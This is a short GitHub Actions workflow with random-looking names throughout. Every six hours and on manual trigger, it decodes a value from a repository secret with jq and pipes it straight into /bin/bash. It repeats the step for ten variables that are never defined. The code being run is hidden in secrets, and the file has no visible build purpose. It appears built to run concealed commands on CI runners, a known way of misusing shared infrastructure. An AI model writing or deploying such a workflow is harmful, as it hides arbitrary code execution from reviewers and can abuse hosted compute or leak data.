name: wangxianglong4567

on:
  workflow_dispatch:
  schedule:
    - cron: '17 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wangxianglong4567
        env:
          coqn9141: ${{ secrets.coqn9141 }}
        run: |
          echo $coqn9141 | jq -r .mwfuw0418 | /bin/bash
          echo $gdgm5 | jq -r .isqx38 | /bin/bash
          echo $yovw85 | jq -r .zwy7197 | /bin/bash
          echo $nze54 | jq -r .yubsc0 | /bin/bash
          echo $sh8 | jq -r .nb023 | /bin/bash
          echo $mkl0059 | jq -r .vgb09498 | /bin/bash
          echo $c27688 | jq -r .noefa81702 | /bin/bash
          echo $d81 | jq -r .aypdm734 | /bin/bash
          echo $dqe22 | jq -r .c36 | /bin/bash
          echo $eb08 | jq -r .hbxl91 | /bin/bash
          echo $adpv9670 | jq -r .mqk62 | /bin/bash

